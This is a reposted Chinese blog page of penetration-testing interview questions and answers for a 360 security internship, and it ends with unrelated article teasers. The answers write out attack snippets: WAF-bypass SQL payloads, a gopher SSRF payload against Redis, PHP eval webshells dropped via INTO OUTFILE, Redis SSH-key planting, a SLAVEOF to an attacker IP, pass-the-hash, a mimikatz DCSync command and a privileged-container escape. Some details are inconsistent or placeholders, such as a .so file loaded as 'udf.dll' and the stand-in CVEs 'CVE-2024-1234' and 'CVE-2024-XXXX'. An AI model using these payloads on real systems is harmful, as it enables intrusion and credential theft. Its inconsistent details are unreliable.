2025年渗透测试面试题总结-360[实习]安全工程师(题目+回答)

news2025/7/15 16:28:07

网络安全领域各种资源,学习文档,以及工具分享、前沿信息分享、POC、EXP分享。不定期分享各种好玩的项目及好用的工具,欢迎关注。

目录

1. 自我介绍

2. WAF及其绕过方式

3. IPS/IDS/HIDS

4. 云安全

5. 绕过安骑士/安全狗

6. Gopher扩展攻击面

7. Struts2漏洞

8. UDF提权

9. DOM XSS

10. 数据库提权

11. 攻击Redis

12. 内网渗透

13. 容器安全

14. Kubernetes Docker逃逸

15. Linux/Windows命令

16. 站库分离拿Webshell


1. 自我介绍

我是专注于应用安全与渗透测试的安全工程师,熟悉Web漏洞挖掘(SQL注入、XSS、RCE)、内网横向移动(域渗透、票据伪造)、云安全(IAM策略、容器逃逸)及自动化工具开发。具备CTF实战经验,熟悉WAF绕过、内存马注入等技术栈,对红队攻防有系统化理解。


2. WAF及其绕过方式

WAF核心原理:基于规则匹配拦截恶意流量(如SQL关键字、XSS标签)。
绕过方式

  1. 混淆编码
    • URL编码、Unicode编码(如%u003cscript%u003e)。
    • 注释插入:SEL/**/ECT 1
  2. 协议特性利用
    • HTTP参数污染(HPP):?id=1&id=UNION SELECT 1
    • 分块传输(Chunked Encoding)绕过长度检测。
  3. 逻辑绕过
    • 大小写混合:UnIoN SeLeCt
    • 冗余参数:1 AND 1=1/*&foo=bar*/

3. IPS/IDS/HIDS

类型功能部署位置
IPS实时阻断攻击流量(如SQL注入)网络边界
IDS检测并报警异常流量(被动模式)网络关键节点
HIDS监控主机行为(进程、文件变动)服务器/终端

4. 云安全

核心防护点

  1. IAM权限最小化:避免授予*:*权限,使用角色临时凭证。
  2. 存储加密:启用AWS S3 SSE-KMS、阿里云OSS服务端加密。
  3. 日志审计:集中管理CloudTrail、操作日志,检测异常API调用。
  4. 网络隔离:VPC子网划分,安全组仅开放必要端口。

5. 绕过安骑士/安全狗

  1. 流量混淆
    • 使用动态Payload生成(如随机字符串分割)。
    • 多级编码:Base64 → Hex → URLEncode。
  2. 内存马注入:通过Java Agent或PHP扩展加载恶意代码,绕过文件监控。
  3. 合法工具滥用:利用PowerShell、certutil下载执行恶意文件。

6. Gopher扩展攻击面

攻击场景:利用Gopher协议构造请求攻击内网服务。
示例

  • 攻击Redis未授权访问
    bashgopher://192.168.1.1:6379/_*1%0d%0a$8%0d%0aflushall%0d%0a*3%0d%0a$3%0d%0aset%0d%0a$1%0d%0a1%0d%0a$XX%0d%0a{恶意Payload}%0d%0a 
  • 利用SSRF漏洞:通过Gopher协议访问内网MySQL/Redis服务。

7. Struts2漏洞

经典漏洞

  1. S2-045(CVE-2017-5638)
    • 利用Content-Type头注入OGNL表达式。
    • Payload:%{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)...}
  2. 防御:升级至Struts 2.5.26+,禁用动态方法调用(struts.enable.DynamicMethodInvocation=false )。

8. UDF提权

步骤

  1. 上传恶意DLL:通过MySQL写入lib_mysqludf_sys.so 到插件目录。
  2. 创建函数CREATE FUNCTION sys_exec RETURNS STRING SONAME 'udf.dll';
  3. 执行命令SELECT sys_exec('whoami');
    防御:限制MySQL FILE权限,禁用plugin_dir写入。

9. DOM XSS

特点:客户端JavaScript动态修改DOM引发漏洞,不依赖服务端响应。
示例

javascriptvar input = document.location.hash.substr(1); document.write("User: " + input); // 攻击:http://site.com#<img src=x onerror=alert(1)>

防御:使用textContent替代innerHTML,对输入调用encodeURIComponent()


10. 数据库提权

  1. MySQL
    • UDF提权(如sys_exec)。
    • 写Webshell:SELECT '<?php @eval($_POST[cmd]);?>' INTO OUTFILE '/var/www/shell.php'
  2. MSSQL
    • 启用xp_cmdshell:EXEC sp_configure 'show advanced options', 1; RECONFIGURE;

11. 攻击Redis

  1. 未授权访问
    • 写SSH公钥:config set dir /root/.ssh/ && config set dbfilename authorized_keys
  2. 主从复制RCE
    • 恶意Redis服务端注入模块:SLAVEOF 攻击者IP 6379

12. 内网渗透

步骤

  1. 信息收集
    • ARP扫描:arp-scan -l
    • 端口探测:nmap -sS 10.0.0.0/24
  2. 横向移动
    • Pass The Hash:psexec.py -hashes :NTLM_HASH user@target
  3. 域渗透
    • DCSync攻击:mimikatz.exe "lsadump::dcsync /domain:corp.com /user:Administrator"

13. 容器安全

风险点

  1. 镜像漏洞:使用docker scan扫描镜像(如CVE-2024-1234)。
  2. 特权容器:避免--privileged启动容器。
  3. 挂载逃逸:挂载宿主机目录导致权限提升。

14. Kubernetes Docker逃逸

场景

  1. 特权容器逃逸
    • 在容器内挂载宿主机根目录:docker run --privileged -v /:/host ubuntu chroot /host bash
  2. CVE-2024-XXXX:利用runC漏洞绕过命名空间隔离。

15. Linux/Windows命令

场景Linux命令Windows命令
过滤文件grep "keyword" /path/*.logfindstr /s /i "keyword" *.log
查看进程环境变量cat /proc/{PID}/environwmic process get Caption,CommandLine,ProcessId

16. 站库分离拿Webshell

思路

  1. 数据库写Shell
    • MySQL:SELECT '<?php eval($_POST[cmd]);?>' INTO OUTFILE '/var/www/html/shell.php' (需绝对路径)。
  2. 利用中间件漏洞
    • 通过SQL注入获取数据库服务器权限,反向连接至Web服务器。

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/2380326.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

Ubuntu16.04升级gcc/g++版本方法

0 前言 gcc与g分别是GNU的c和c编译器&#xff0c;Ubuntu16.04默认的gcc和g的版本是5.4.0&#xff0c;在使用一些交叉编译工具链会提示找不到GLIBC_2.27&#xff0c;而GLIBC_2.27又需要gcc 6.2以上版本&#xff0c;因此本文介绍Ubuntu16.04升级gcc/g版本的方法。 1 Ubuntu16.0…

微信小程序van-dialog确认验证失败时阻止对话框的关闭

使用官方(Vant Weapp - 轻量、可靠的小程序 UI 组件库)的before-close&#xff1a; wxml&#xff1a; <van-dialog use-slot title"名称" show"{{ show }}" show-cancel-button bind:cancel"onClose" bind:confirm"getBackInfo"…

OceanBase 的系统变量、配置项和用户变量有何差异

在继续阅读本文之前&#xff0c;大家不妨先思考一下&#xff0c;数据库中“系统变量”、“用户变量”以及“配置项”这三者之间有何不同。如果感到有些模糊&#xff0c;那么本文将是您理清这些概念的好帮手。 很多用户在使用OceanBase数据库中的“配置项”和“系统变量”&#…

【Python】Jupyter指定具体路径

一、右键Jupyter Notebook 右击Jupyter Notebook点击属性 二、修改以下两个地方

RNope:结合 RoPE 和 NoPE 的长文本建模架构

TL;DR 2025 年 Cohere 提出的一种高效且强大的长上下文建模架构——RNope-SWA。通过系统分析注意力模式、位置编码机制与训练策略&#xff0c;该架构不仅在长上下文任务上取得了当前最优的表现&#xff0c;还在短上下文任务和训练/推理效率方面实现了良好平衡。 Paper name …

virtualbox虚拟机中的ubuntu 20.04.6安装新的linux内核5.4.293 | 并增加一个系统调用 | 证书问题如何解决

参考文章&#xff1a;linux添加系统调用【简单易懂】【含32位系统】【含64位系统】_64位 32位 系统调用-CSDN博客 安装新内核 1. 在火狐下载你需要的版本的linux内核压缩包 这里我因为在windows上面下载过&#xff0c;配置过共享文件夹&#xff0c;所以直接复制粘贴通过共享文…

unity UGUI虚线框shader

Shader "Custom/DottedLineShader" {Properties{_MainTex ("Texture", 2D) "white" {}_Color("Color",COLOR) (1,1,1,1)_LineLength("虚线长度",float) 0.08}SubShader{Tags //设置支持UGUI{ "Queue""Tran…

chirpstack v4版本 全流程部署[ubuntu+docker]

背景介绍 由于chirpstackv3 版本使用的是锐米提供的版本,从网络上寻找的资源大多数都是一样的v3版本,是经过别人编译好发布出来的,原本的chirpsatck项目是运行的linxu环境下的,因此我的想法是在linux服务器上部署chirpsatckv4,暂时使用linux上的chirpstack v4版本,目前编译成e…

数字信号处理-大实验1.1

MATLAB仿真实验目录 验证实验&#xff1a;常见离散信号产生和实现验证实验&#xff1a;离散系统的时域分析应用实验&#xff1a;语音信号的基音周期&#xff08;频率&#xff09;测定 目录 一、常见离散信号产生和实现 1.1 实验目的 1.2 实验要求与内容 1.3 实验…

对抗性机器学习:AI模型安全防护新挑战

随着采用对抗性机器学习&#xff08;Adversarial Machine Learning, AML&#xff09;的AI系统融入关键基础设施、医疗健康和自动驾驶技术领域&#xff0c;一场无声的攻防战正在上演——防御方不断强化模型&#xff0c;而攻击者则持续挖掘漏洞。2025年&#xff0c;对抗性机器学习…

[[春秋云境] Privilege仿真场景

文章目录 靶标介绍&#xff1a;知识点卷影拷贝(VSS) 外网任意文件读取Jenkins管理员后台rdp远程登录Gitlab apiToken 内网搭建代理 Oracle RCESeRestorePrivilege提权mimikatzspn卷影拷贝提取SAM 参考文章 靶标介绍&#xff1a; 在这个靶场中&#xff0c;您将扮演一名资深黑客…

Redis学习打卡-Day3-分布式ID生成策略、分布式锁

分布式 ID 当单机 MySQL 已经无法支撑系统的数据量时&#xff0c;就需要进行分库分表&#xff08;推荐 Sharding-JDBC&#xff09;。在分库之后&#xff0c; 数据遍布在不同服务器上的数据库&#xff0c;数据库的自增主键已经没办法满足生成的主键全局唯一了。这个时候就需要生…

数据库第二次作业--SQL的单表查询与多表查询

单表查询 查询专业信息表中的专业名称和专业类型 SELECT Mname, Mtype FROM MajorP;查询一个学校有多少个专业 SELECT COUNT(Mno) AS 专业数量 FROM MajorP;查询学校的男女学生各有多少位 SELECT Ssex&#xff0c; COUNT(*) AS 人数 FROM StudentP GROUP BY Ssex查询每个专业…

在Cursor中启用WebStorm/IntelliJ风格快捷键

在Cursor中启用WebStorm/IntelliJ风格快捷键 方法一&#xff1a;使用预置快捷键方案 打开快捷键设置 Windows/Linux: Ctrl K → Ctrl SmacOS: ⌘ K → ⌘ S 搜索预设方案 在搜索框中输入keyboard shortcuts&#xff0c;选择Preferences: Open Keyboard Shortcuts (JSON) …

vue3:十三、分类管理-表格--编辑、新增、详情、刷新

一、效果 实现封装表格的新增、编辑、详情查看,表格刷新功能 实现表格组件中表单的封装 1、新增 如下图,新增页面显示空白的下拉,文本框,文本域,并实现提交功能 2、编辑 如下图,点击行数据,可将行数据展示到编辑弹窗,并实现提交功能 3、详情 如下图,点击行数据,…

c#基础01(.Net介绍)

文章目录 .Net平台介绍.Net平台简介跨平台开源.Net Core.Net Framework开发工具安装选项 创建项目 .Net平台介绍 .Net平台简介 .NET是一种用于构建多种应用的免费开源开放平台&#xff0c;例如&#xff1a; Web 应用、Web API 和微服务 云中的无服务器函数 云原生应用 移动…

Logrotate:配置日志轮转、高效管理Linux日志文件

Logrotate 是 Linux 系统中用于自动化管理日志文件的工具&#xff0c;能够定期轮转、压缩、删除日志文件&#xff0c;确保系统日志不会无限制增长&#xff0c;占用过多磁盘空间。 它通常由 Cron 作业定期执行&#xff0c;也可以手动触发。 1. &#x1f527; 核心功能 日志轮转…

贵州某建筑物挡墙自动化监测

1. 项目简介 某建筑物位于贵州省某县城区内&#xff0c;靠近县城主干道&#xff0c;周边配套学校、医院、商贸城。建筑物临近凤凰湖、芙蓉江等水系&#xff0c;主打“湖景生态宜居”。改建筑物总占地面积&#xff1a;约5.3万平方米&#xff1b;总建筑面积&#xff1a;约15万平…

nginx服务器实验

1.实验要求 1&#xff09;在Nginx服务器上搭建LNMP服务&#xff0c;并且能够对外提供Discuz论坛服务。 在Web1、Web2服务器上搭建Tomcat 服务。 2&#xff09;为nginx服务配置虚拟主机&#xff0c;新增两个域名 www.kgc.com 和 www.benet.com&#xff0c;使用http://www.kgc.…

高速光耦在通信行业的应用(五) | 5Mbps通信光耦的特性

针对5MBd速率光耦市场&#xff0c;晶台推出KL2200、KL2201和KL2202系列光耦 ,对标大部分国外品牌产品的应用&#xff1b;它分别由一个红外发射二极管和一个高速集成光电检测器逻辑门组成。 它采用 8 引脚 DIP 封装&#xff0c;并提供 SMD 选项。KL2200 的检测器具有一个三态输出…